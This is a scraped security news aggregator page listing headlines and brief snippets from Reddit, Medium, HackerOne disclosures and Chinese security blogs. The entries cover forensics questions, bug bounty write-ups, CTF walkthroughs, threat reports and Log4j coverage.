    Does anyone know what "gaia_account_name" means specifically in the context of a Google Duo database table?
    I couldn't find much at all, but I feel like "gaia" has some connotation like mother/creator/origin, and thus "gaia_account_name" means the account name of the user that setup Google Duo on the device. Any progress toward certainty is greatly appreciated. submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 1 min )
    I hosted a webinar for HTCIA last week about providing effective expert witness testimony - here’s the recording!
    submitted by /u/Monolith_Pro [link] [comments]  ( 1 min )
    Effective imaging/cloning large disk
    Hi there. Is there a most effective way of imaging very large disks (over 2 terra bytes)? The next challenge is when doing the automated analysis (I'm using Autopsy), is there a more effective (fastest) way to do this? I once analyzed a 1 TB disk using Autopsy and it took more than 1 week to complete (the computer specification: CPU i7 6th Gen, RAM 32GB, imaging results on SSD, and using type C connector) EDIT 1: Thank you for all of your feedback. I can't afford a TX1 or any licensed tool (hardware or software based) at the moment. Using the open source tool is preferred. However, I also open for any licensed hardware or software suggestions. The only licensed hardware that I use is the WiebeTech write blocker. I'm using Autopsy for automated analysis (some ingest modules were used such as hashing, web artifacts, keyword search, and Plaso) and CAINE for manual analysis. submitted by /u/modpr0be [link] [comments]  ( 3 min )
  • Open

    Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)
    So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out… Continue reading on Medium »
    Coletando parâmetros com o BURP SUITE!
    A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu… Continue reading on Medium »  ( 2 min )
    Early bed bug stains on sheets
    Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with… Continue reading on Medium »  ( 3 min )
    My First Blind XSS
    Disclaimer Continue reading on Medium »  ( 2 min )
    Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
    Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting. Continue reading on Medium »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
    Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the… Continue reading on Medium »  ( 2 min )
    XYZ of XSS
    Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would… Continue reading on Medium »  ( 4 min )
    PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB ÇÖZÜMLERİ
    Web uygulamalarının en önemli parçalarından biri olan Authentication, belirli bir kullanıcı veya istemcinin kimliğini doğrulama işlemidir… Continue reading on Medium »  ( 17 min )
    How I Hacked into Pune University’s Exam/Teachers Portal
    Bypassing the Authentication mechanism results in an amazing Account takeover. Continue reading on Medium »  ( 4 min )
    Nakji Network’s 200K Bug Bounty Program
    The Nakji Foundation Continue reading on Medium »  ( 2 min )
  • Open

    Big Tech advertiser friendliness and SEO garbage.
    This is potentially a bit off-topic for this sub, but hopefully well within scope for the users: Feels like search results are full of complete nonsense (I've moved from google to qwant about a year ago, which was good at first, but now seems to be getting worse) and individual mainstream websites are constantly banning creators and removing content that's otherwise useful but potentially unfriendly to advertisers. This is just a loose feeling that the internet is getting worse every day, I'm wondering if there is any pushback against this and if it's possible to get an experience closer to 10-15 years ago when it didn't feel like a dystopian hellscape was rapidly approaching. Are corporate friendly walled gardens going to be the future of the internet? Is this going to be preferred when search engines lose the arms race against SEO spam? Is the sky actually falling? submitted by /u/TwinkyTheBear [link] [comments]  ( 1 min )
    Any love for Carbon Black EDR?
    CB Advanced is $30/device. SentinelOne Control is $31/device. CB gives me a process tree/timeline of the attack. S1 requires Complete to do that, about $60/device. I've been quoted $2,500 for VMware to help setup my policies so it's set and forget. I read a lot of hate on here about CB being too noisy. Also a decent amount of hate for S1. CrowdStrike seems to be the favorite but it's $70-80/device, so wanting CB or S1. Which one would you go with? 200 devices, so small environment. Upgrading from Webroot, so anything is better. submitted by /u/JeepMunkee [link] [comments]  ( 2 min )
    Which cloud IaS service for DDoS tests?
    Hello, we are a small pentesting firm and want to include (small-scale, short-term!) "DDoS" tests in our portfolio (only whitehat tests with full permission, simple stuff such as SYN floods, TLS flooding, slow loris). Our last cloud VPS vendor was ok with it first, but withdrew their permission to use their boxes for any kind of DDoS testing after a number of successful tests. Maybe it was just a nervous employee - but it is a problem for us if we cannot fulfill our obligations to our customers if the cloud vendor suddenly cuts our service. => We are thus looking for a reliable and trustworthy cloud IaS (VPS) provider for small scale DDoS tests: Up to a 100 virtual servers at a time (starting with 1, then adding servers until saturation is given or the target system passes the test without service reduction) API for instantiating/provisioning and starting/stopping the boxes, executing scripts Reasonable network connection - but volumetric DDoS testing is only the smallest part of our test suite Central to Eastern European area preferred Only whitehat tests with full permission, reputable business Only short bursts in the magnitude of minutes (until our monitor sensor recognizes service degradation in the target) Can you recommend cloud VPS vendors which are OK with such small-scale, short-term DDoS tests? Thank you very much! Dany submitted by /u/thrownetsecddos [link] [comments]  ( 1 min )
    What is this presumed phishing email trying to accomplish?
    The only thing I can think of is they are trying to get me to call the 888-number in the message. Simple Order is restaurant software, I don't work in a restaurant and they wouldn't have iPads. The address at the bottom in California is a house. There is no Durham in NY that I can find (the ship to). Paypal is clean. What am I missing? There are no links, no pictures or attachments I can find. I sanitized my name (which was correct) and my email address, everything else is from the original raw email. Please let me know if you need anything else to help figure out what's happening here. Thanks! ​ Received: from 10.217.151.75 by atlas212.free.mail.ne1.yahoo.com with HTTPS; Thu, 20 Jan 2022 15:49:18 +0000 Return-Path: X-Originating-Ip: [209.85.166.178] Rec…  ( 5 min )
    Help with Masters Thesis :) Python RAT Malware Samples
    Hey everyone, I am currently in the process of completing my dissertation which involves creating my own python malware to test some free anti-virus solutions and software. For the dissertation/thesis i need to find some samples of RAT malware written in python to analyse , I have managed to find a couple but ideally I need a good website/resource that has a database off them. Any help would be great , many thanks! submitted by /u/DJ0x [link] [comments]  ( 2 min )
    Home network abused for brute force ssh attacks
    Hi, an interesting security incident occured at my home and I would greatly appreciate advice on how to proceed. Few days ago, my HBO service was blocked in all my devices connected to my home WiFi (yet worked outside the network), which was quite interesting and after few calls to HBO support I finally got the information that they actively blocked my IP address due to malicious activity occuring from my IP that was reported in public database. After some googling I found out that this must be the https://www.abuseipdb.com/ where my IP address really was reported (38x) for categories: "Port Scan", "Hacking", "Brute force", "SSH". I checked the reports in details and it seems that all attacks were done via SSH and they were trying to log into different websites using different user name…  ( 5 min )
    Where do you draw the line between legal and illegal?
    I've been jr pentester for few months and was wondering right before you get green light to pentest an web application and you have spare time at work and decide to gather some information, what is your approach? I can find some emails of the company and check with what tools the web app was build. But whenever I do subdomain scraping with amass or sublist3r or other frameworks the firewall is always signaling. I have absolutely no intention to do something illegal and get in trouble neither me or the company. Where do you draw the line which act is legal and illegal? I also want to get into bug bounty programs, but I am afraid because of the same reason. When doing do you use any proxies or other stuff? How do you basically stay safe(keep some anonymity) even for whitehat, when doing this job. submitted by /u/tryingtoworkatm [link] [comments]  ( 4 min )
    What's more lucrative: black hat or white hat hacking?
    submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
  • Open

    Using Go to Develop Offensive Tooling
    With better Security Tooling, that can easily detect Powershell and C# Offensive Tooling, Red Teamers have to adapt their offensive capabilities. Go is a staticly linked programming language which can be easily crossed compiled and needs no installation dependencies. This makes it perfect for Red Teamers. This great talk describes how Golang can be used in an offensive way: ​ https://youtu.be/AGLunpPtOgM submitted by /u/_R4bb1t_ [link] [comments]  ( 1 min )
    MoonBounce: the dark side of UEFI firmware
    submitted by /u/dmchell [link] [comments]
  • Open

    Threat Brief: Ongoing Russia and Ukraine Cyber Conflict
    We analyze and suggest mitigations for CVE-2021-32648 and WhisperGate, two threats that have been targeting Ukrainian organizations. The post Threat Brief: Ongoing Russia and Ukraine Cyber Conflict appeared first on Unit42.
  • Open

    Exnoscan
    Exnoscan is a simple bash script that can help you identify gaps. We often monitor what we know, so Exnoscan aims to identify what you… Continue reading on Medium »  ( 2 min )
    Cyber Detective OSINT CTF “Evidence Investigation” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. Continue reading on Medium »  ( 7 min )
    Realizando OSINT con Google LENS
    Hoy les traigo a ustedes un nuevo articulo, donde decidí abordar una temática en especial, haciendo aprovechamiento de una de mis mayores… Continue reading on Medium »  ( 4 min )
    GEOINT y SOCMINT en la Investigación
    Hace unos días leí un artículo del Sr. Diaz Caneja, donde el autor destaca muy bien los alcances del social media intelligence y los… Continue reading on Medium »  ( 3 min )
    Los nuevos paradigmas de la Investigación: CRIMINT y Social media analitycs ante la digitalización
    Para comenzar a hablar sobre estos nuevos paradigmas, primero debemos entender dichas terminologías con el fin de ser mas amena nuestra… Continue reading on Medium »  ( 4 min )
    “YOU” una serie que nos muestra la vulnerabilidad de nuestra información en las Redes Sociales
    Netflix largo una nueva serie donde nos deja ver la importancia de nuestros datos, en dicha historia un joven se obsesiona con una mujer y… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 4
    On Jan 7, 2022, Quiztime (contributor @fiete_stegers) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 3
    On Jan 5, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out what was… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 2
    On Jan 1, 2022, a regular Quiztime and contributor @bayer_julia shared a new OSINT quiz with us. The objective was, simple. We had to… Continue reading on Medium »  ( 2 min )
    Quiztime — Random OSINT Challange 1
    On December 29, 2021, Quiztime (contributor @ twone2) shared a new OSINT quiz with us. The objective was, for me at least not very simple… Continue reading on Medium »  ( 2 min )
  • Open

    A Detailed Analysis of WhisperGate Targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Pentest Collaboration Framework: tool which will help you to store/modify/share information about pentest/web analysis projects. OpenSource, Portable, CrossPlatform & completely free! Supports integration with 15 tools & user-defined report generation. For several teams: seperated workspaces!
    submitted by /u/Any_Gas_6250 [link] [comments]  ( 1 min )
    HOUDINI: A web app with huge number of Docker Images for Network Security with run commands and cheatsheet (Hundreds of Offensive and Useful Docker Images for Network Intrusion )
    submitted by /u/deleee [link] [comments]  ( 1 min )
    How mail server related DNS settings (SPF, DKIM, DMARC, MTA-STS, DANE, BIMI) work and their usage stats in the top 1M domain
    submitted by /u/c0r0n3r [link] [comments]  ( 1 min )
    First Morello prototype architecture silicon (memory safety at a hardware level)
    submitted by /u/unaligned_access [link] [comments]  ( 3 min )
    SMBSR made it through another lockdown with some new interesting skills (and fixes). Go check out and judge it (respectfully)
    submitted by /u/oldboy21 [link] [comments]  ( 1 min )
    OctopusWAF is an open-source web application firewall made in C language and uses libevent resources.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-20 Review
    浅析现代企业网络安全架构 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-20 Review
    浅析现代企业网络安全架构 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    WMI for Script Kiddies
    Introduction Let’s say an ‘Administrator’ lands on a target network host and wants to look around and ‘administer’ the system without uploading any new tools… How can I do that without burning any of my Script Kiddie tools? WMI or Windows Management Instrumentation or Windows Managed Infrastructure is an interface for managed components that provides... The post WMI for Script Kiddies appeared first on TrustedSec.  ( 12 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Rust – Security advisory for the standard library (CVE-2022-21658)
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30007470 Points: 10 # Comments: 0  ( 2 min )
  • Open

    攻击者用成人游戏做诱饵,通过网盘传播恶意软件
    近日,安全研究人员发现 DDoS IRC Bot 恶意样本正伪装成成人游戏通过网盘进行传播。  ( 1 min )
    攻击者开始使用 XLL 文件进行攻击
    近期,研究人员发现使用恶意 Microsoft Excel 加载项(XLL)文件发起攻击的行动有所增加。  ( 1 min )
    2027年网络安全沙盒市场规模将达到430亿美元
    中国网络安全沙盒市场规模到2027 年预计达到 69 亿美元的市场规模。  ( 1 min )
    《信息安全技术 网络安全从业人员能力基本要求》(征求意见稿)发布
    《基本要求》规定了网络安全从业人员分类和各类从业人员具备的知识和技能要求,适用于各类组织对网络安全从业人员的选拔、培养、评价、管理等。
    营销巨头RRD承认在Conti勒索软件攻击中数据被盗
    美国营销巨头RR Donnelly(RRD)公司日前透露,该公司在一次12月的网络攻击中被窃取了数据。事后经BleepingComputer证实,这是一次Conti勒索软件攻击。RRD是一家头部的综合服务公司,为企业客户提供通信、商业印刷和营销服务。公司在全球200多个地点拥有超33,000名员工,其2021年的收入为49.3亿美元。2011年12月27日,RRD公司向美国证券交易委员会(SEC)
    九部门联合发布《关于推动平台经济规范健康持续发展的若干意见》
    《意见》从健全完善规则制度、提升监管能力和水平、优化发展环境、增强创新发展能力、赋能经济转型发展、保障措施等方面提出了十九条措施。
    红十字国际委员会遭受网络攻击,超 51.5 万人的数据发生泄露
    红十字国际委员会披露其数据承包商遭受网络攻击,导致“家庭团聚”项目信息泄露,超过 51.5 万民众个人数据被盗。  ( 1 min )
    FreeBuf早报 | 美国特工利用WhatsApp监视中国手机;中国首个网安行业服务短号开通
    根据俄亥俄州刚刚申请解封的政府监控显示,2021 年 11 月,美国缉毒署的调查人员要求WhatsApp跟踪 7 名位于中国的用户。。  ( 1 min )
    CACTER邮件安全&中睿天下发布2021年Q4企业邮箱安全报告:重点关注,钓鱼邮件翻倍,85%来自境外!
    CACTER邮件安全联合中睿天下发布邮件安全报告! ️钓鱼邮件同比翻倍增长!来源85%居然来自境外? 年关将至,提高防范,刻不容缓  ( 1 min )
    基于商密SM9算法的物联网安全平台设计与应用
    如何解决物联网的安全,成为摆在政府监管和各类企业面前的一道难题。因此,推行完整、科学、规范化的物联网安全平台已成当务之急。  ( 1 min )
    90分的机房长什么样?(一)
    接上篇《90分的机房长什么样?(一)》内容,本篇继续为大家讲解机房设备中的另外三方面测评标准。  ( 1 min )
    任子行视频网解决方案,专注视频监控数据安全防护!
    有网友爆料称,在B站上还能看到疑似专门破解学校、医院等公共场所监控视频并上传的账号,并可以通过相关的账号看到有用户上传的多段教师讲课、医院护士台以及酒店前台的监控视频。
    剖析NX开启状态下ROP的构造
    在学习pwn的过程中,我们通常会碰到开启NX的情况,也就是堆栈不可执行,在这种情况下,我们要利用栈内的未被清空的内容或者例如init这种函数,来进行构造rop,进一步编写exp拿到shell。  ( 1 min )
    营销巨头数据被盗、国际红十字会遭遇网络攻击|1月20日全球网络安全热点
    FBI警告:骗子正在使用假二维码窃取您的密码和金钱。  ( 1 min )
    网络钓鱼者正冒充美国劳工部骗取用户Office 365账号
    该钓鱼活动已经持续了至少几个月,邮件发件人假装是DoL的高级员工,邀请收件人为正在进行的政府项目提交投标。
    FreeBuf网安大事记 | 2021年度国内网安事件汇总
    国内网络环境一直处于“水深火热”中,网络世界对抗的趋势越来越明显,受到别国的网络攻击频率不断增加。  ( 1 min )
  • Open

    Honeypot Discussions Part-3
    In this article, we will end the honeypot trilogy. If you haven’t read yet Part-1 and Part-2, you may take a look at them first. Or we can… Continue reading on Medium »  ( 7 min )
  • Open

    How Stack Overflow users responded to Log4Shell, the Log4j vulnerability
    Article URL: https://stackoverflow.blog/2022/01/19/heres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone/ Comments URL: https://news.ycombinator.com/item?id=30003308 Points: 2 # Comments: 0  ( 6 min )
  • Open

    wildlife photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike
    submitted by /u/dmchell [link] [comments]
    Kraken the Code on Prometheus
    submitted by /u/dmchell [link] [comments]
    PerSwaysion Threat Actor Updates Their Techniques and Infrastructure
    submitted by /u/dmchell [link] [comments]
    The OAuth Misconfiguration
    submitted by /u/banginpadr [link] [comments]
  • Open

    Xelu's FREE Controller Prompts | Visual prompts for every mainstream controller's inputs
    submitted by /u/PCubiles [link] [comments]  ( 1 min )
    A large folder of Charles Manson audio recordings
    http://109.120.203.163/Music/BLUES%20and%20country/Charles%20Manson/ Go upwards for more. If anyone finds any steel lap guitar resources, send them my way. I've decided to focus on music and living a simple life, something my life the last few years hasn't been. I changed countries, moved to the country and took a job in nursing. (until I convince my friend Andy to let me session/ tour with his band.) submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    D&D stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391724 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391725 - Bounty: $450
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391726 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391727 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391728 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391729 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391771 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391772 - Bounty: $450
    [GO]: [CWE-090: LDAP Injection All For One]
    GitHub Security Lab disclosed a bug submitted by pupiles: https://hackerone.com/reports/1397942 - Bounty: $1800
    [Python]: CWE-079: HTTP Header injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1401159 - Bounty: $1800
    [Python]: JWT security-related queries
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1403263 - Bounty: $1800
    ihsinme: CPP Add query for CWE-675 Duplicate Operations on Resource
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1413540 - Bounty: $1000
    [porcupiney.hairs]: [Python] Add Flask Path injection sinks
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1413541 - Bounty: $1800
    [Java] CWE-400: Query to detect uncontrolled thread resource consumption
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1413542 - Bounty: $1800
    Java: Regex injection
    GitHub Security Lab disclosed a bug submitted by edvraa: https://hackerone.com/reports/1443028 - Bounty: $1000
    [Javascript]: [Clipboard-based XSS]
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1448236
    [Java] CWE-089: MyBatis Mapper XML SQL Injection
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1442954 - Bounty: $4500
    [Java] CWE-552: Query to detect unsafe request dispatcher usage
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1454582 - Bounty: $1800
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1438393
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1423496
    Reflected XSS on https:///via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029243
    Reflected XSS in https:// via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029238
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223577
    Wrong settings in ADF Faces leads to information disclosure
    U.S. Dept Of Defense disclosed a bug submitted by h3xr: https://hackerone.com/reports/1422641
    User can pay using archived price by manipulating the request sent to `POST /v1/payment_pages/for_plink`
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1328278 - Bounty: $1000
    Dom Xss vulnerability
    Recorded Future disclosed a bug submitted by fornex: https://hackerone.com/reports/1448616
    Exposed Golang debugger on tier3.riot.mail.ru:9090, 9080
    Mail.ru disclosed a bug submitted by ian: https://hackerone.com/reports/1247910
  • Open

    Are you Looking for a team? Looking to collaborate with other hackers?
    We are looking for more members to join our team to collaborate on Projects, HackTheBox, CTF's & Bug Bounties. Our Members have found Vulnerabilities in the US Dept of Defense, Verizon Media, Yahoo & More on the HackerOne platform. We also have members that have been in the HTB Top 10 & 1st in the UK. You don't have to be the best, we are willing to help and teach members who may not be on our skill level, so please sign up if you're interested. We are trying to create a non-toxic environment in which hackers can collaborate without any drama. Please fill out our form and we will be in contact! Link to form: https://forms.gle/CDzVBLynAL9ftwK38 submitted by /u/Far-Piece-7371 [link] [comments]  ( 1 min )
  • Open

    PCAP Analysis
    Hi there. I am just starting to learn about PCAP analysis/forensics. I am experienced in Windows OS forensics and never really worked with PCAPs before. What's some of the tools everyone uses besides Wireshark? I've been reading up on Zeek. submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    Tails Memory Forensics
    I was curious if anyone knows of any articles that cover this topic. A quick google search hasn’t bore anything useful. Preferably a professional paper submitted by /u/strollingginger [link] [comments]  ( 1 min )
    Degree decision
    Is CS or CE better for cyber forensics? submitted by /u/swatteam23 [link] [comments]  ( 2 min )
  • Open

    From MVP to ISO27001/SOC 2
    Hi Everyone, I just joined this community and would like to reach out with a question. I am a co-founder of an early-stage tech startup (saas) where we're about to reach our second product milestone soon - MVP. Our first commercial release ("Minimum Marketable Product") should happen around September 2022. We are about ten people, half of them developers. Everything is in the cloud. We have a Chief Architect who is a very mature professional. I don't have an IT background, but as we'd like to work with enterprises and other security-minded organizations, I am considering obtaining certification for standards like ISO27001 and/or SOC 2 (Type I and II). Is it a reasonable ambition to start this process as soon as our MVP is out (next month), or it's more realistic to wait until our product and team gains more maturity? If we have to pick, e.g. due to budget constraints, would you recommend to pursue ISO27001 or SOC 2? tl;dr: For a very young startup, what is the best time to start working on compliance and certifications? Thank you! submitted by /u/brunotoronto [link] [comments]  ( 3 min )
    Trend micro Apex One vs Deep Security/Cloud one
    Hi all, Is ApexOne good for Servers and Endpoints both? Or do we need to suggest Deep Security? If it is not good for Servers, why so? I know they are both the products of trend micro, but am not able to find understandable differences between both, need to know the difference between them for a project. Any kind of information or help on this would be nice, thank you. submitted by /u/aaronthecoolgnome [link] [comments]  ( 1 min )
    Hacking books(python) for intermediate programmers
    Some good python books for people who don't know anything about hacking but are intermediate programmers. I've read the book :- Starting out with Python, 5th Edition, ISBN : 9780135929032 submitted by /u/SufficientResident59 [link] [comments]
    Why do hackers like using reverse proxies?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Why do people put dots at the end of everything they send in work messages?
    Okay, I know this may not be the right Reddit sub for this question but I figured in IT most of us deal with teams or some sort of messaging. I know this also is kind of a weird thing to make a post about but it just is something I don't understand and genuinely want to. Whenever I message people at work or they message me they always leave dots at the end of a lot of the things they are saying. I have gotten dozens of messages saying "Hello...". It is not a typo either there is no way it could be. It reminds me of when someone texts you something and add it for dramatic effect but it will literally be messages like the one above saying hello or just "Sure...". It's just kind of odd to me but just was wondering if anyone knew why. Edit: Grammar & Thanks for the Informative Responses! submitted by /u/winningrove [link] [comments]  ( 4 min )
    Resources for Compensation
    Hi Everyone, I need some help finding compensation resources. Our security team has been having conflict over compensation with our HR compensation team. We want them to change the compensation band for a Mid-Level Security Analyst because the starting salary is $90k (105 Overall COL area). They tell us they want to start roles at 85% of the grade for the band which is around $70k-$80k. The role requires 5 years of IT exp with 2+ of Security. They claim they have done research but wont share their evidence stating the role is graded properly. It doesnt seems to align with what I have been seeing for other jobs, what people are asking for, or what I found on NIST NICE. what resources are out there to help identifying compensation for roles in cyber by industry (i.e. e-commerce, higher ed, govt, etc). I want to bring something to them that says we are way below market and cannot be competitive but they seem to know otherwise. EDIT: Im the hiring manager for the role submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    How anonymous is a Azure/AWS VM?
    I would like to mess with some scammers but would like to stay fairly anonymous. Am I correctly understanding that my identify is fairly safe when using a VM on Azure or AWS? I am aware MS/Amazon could still pass my identify to the government but I'm not worried about. My main concern is to stay hidden from the scammers. Thanks in advance for your reply. submitted by /u/LouTr0n [link] [comments]  ( 1 min )
    Python and C++ Hacking Projects
    What are good cybersecurity projects for someone who is a beginner-intermediate in hacking? submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    How does my university perform MITM monitoring on secure HTTPS connections?
    Hi AskNetsec, After suspicions towards my university's network provider (Eduroam), I have been digging into the extent of which they do, and/or are able to, monitor the activity of the students, while being on the network. Besides the rather normal DNS restrictions, of monitoring and blocking potentially harmful DNS requests, or in this case redirecting to a custom warning page, I have discovered something I would consider unusual. When accessing certain websites with a secure connection, HTTPS, the certificate for the website is tampered with. Meaning, that the certificate for a given website when requested through the university network, is not identical to the certificate returned when requesting from any other network. When digging deeper into the certificates, I found that custom …  ( 7 min )
  • Open

    Comment trouver des prospects gratuitement ?
    Vous souhaitez construire rapidement et gratuitement une liste de prospection ? Continue reading on Medium »  ( 4 min )
    Fun with Google Maps
    I recently posted a Tweet stating that one is able to search Google Maps by name, username, email, phone number, area code…in fact… Continue reading on Medium »  ( 1 min )
    Sosyal Medya OSINT
    Sosyal medya uygulamaları üzerinde kullanıcı adı ile hesap arama. Continue reading on Medium »  ( 3 min )
    SpiderFoot (Automate OSINT for Threat Intelligences)
    About SpiderFoot Continue reading on Medium »  ( 1 min )
  • Open

    Баг Баунти — заработай до 100,000 PTP
    (на момент написания статьи 100k PTP > $1м) Continue reading on Medium »  ( 1 min )
    Hacking with Subdomain3
    Subdomain3 is great tool that can be used to discover subdomains that belong to a website. The tool is written in Python3. Continue reading on Medium »  ( 1 min )
    Live Bug Bounty Training With My Strategy and Let’s hit easily Bounties Together in this year
    Hello Cybersecurity Researchers, Again I’m here after a lot of texts received on my LinkedIn and Instagram that when I launch my Live Bug… Continue reading on Medium »  ( 1 min )
    How I messed up my own profile data
    Just wanted to share one of my experience which I had while testing one of the web application. I will be brief so that I do not waste… Continue reading on Medium »  ( 2 min )
    Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports
    In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw. Continue reading on Medium »
    Extreme Hacking Mindset
    How to dominate in bug bounties Continue reading on Medium »
    How I found High-Priority PII leak through web archive
    Hello Hackers, Aditya here I am a cyber security student and bug bounty hunter. Continue reading on Medium »  ( 1 min )
  • Open

    CryptoLyzer: A comprehensive cryptographic settings analyzer (introduction with a comparison of cryptographic settings analyzers)
    submitted by /u/c0r0n3r [link] [comments]
    Privilege escalation in Acer Care Center by @last0x00 and @APTortellini
    submitted by /u/last0x00 [link] [comments]
    Introducing TREVORproxy and TREVORspray 2.0
    submitted by /u/aconite33 [link] [comments]
    Gorillas: Special offer - unicorn slices, 150g 🦍❤️
    submitted by /u/moviuro [link] [comments]
    Demonstrating how phishermen abuse free hosting
    submitted by /u/df_works [link] [comments]  ( 1 min )
    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    submitted by /u/HackingLZ [link] [comments]
  • Open

    Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members
    Operation Falcon II, championed by INTERPOL and The Nigeria Police Force, led to the arrest of a number of Nigerian business email compromise actors. The post Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members appeared first on Unit42.
  • Open

    SecWiki News 2022-01-19 Review
    基于上下文感知计算的APT攻击组织追踪方法 by ourren 2021年全球DDoS威胁报告 by ourren 谁动了我的DevOps:DevOps风险测绘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-19 Review
    基于上下文感知计算的APT攻击组织追踪方法 by ourren 2021年全球DDoS威胁报告 by ourren 谁动了我的DevOps:DevOps风险测绘 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    How Do You Know What "Bad" Looks Like?
    From the time I started in DFIR, one question was always on the forefront of incident responder's minds...how do you know what "bad" looks like? When I was heading on-site during those early engagements, that question was foremost on my mind, and very often, the reason I couldn't sleep on the plane, even on the long, cross country flights. As I gained experience, I started to have a sense of what "bad" might or could look like, and that question started coming from the folks around me (IT staff, etc.) while I was on-site. How do you know what "bad" looks like? The most obvious answer to the question is, clearly, "anything that's not "good"...". However, that doesn't really answer the question, does it? Back in the late '90s, I did a vulnerability assessment for an organization, and at one …  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    【安全通报】Weblogic 一月份更新多个高危漏洞
